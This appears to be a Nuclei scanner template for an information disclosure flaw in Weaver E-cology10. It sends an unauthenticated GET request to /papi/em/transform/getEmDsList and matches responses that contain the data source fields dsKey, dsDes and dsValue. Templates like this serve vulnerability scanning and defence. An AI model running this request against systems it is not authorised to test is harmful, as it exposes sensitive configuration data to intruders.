id: weaver-ecology-v10-getEmDsList-disclosure
info:
  name: 泛微E-cology10 getEmDsList 存在信息泄露漏洞
  author: leadlife
  severity: high
  description: 泛微E-cology10 getEmDsList 存在信息泄露漏洞，攻击者可获取敏感信息
  reference: 
    - https://github.com/SourByte05/Vulnerability-Wiki-PoC/blob/cd7d9b337116506097ce5f724619d1849b0b9000/2026/03/%E6%B3%9B%E5%BE%AEE-cology10%20getEmDsList%20%E5%AD%98%E5%9C%A8%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEE-cology10%20getEmDsList%20%E5%AD%98%E5%9C%A8%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    version:
  tags: weaver,disclosure,ecology

http:
  - raw:
      - |
        GET /papi/em/transform/getEmDsList HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip
        Connection: keep-alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/686 Safari/537.36
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'dsKey','dsDes','dsValue')
        condition: and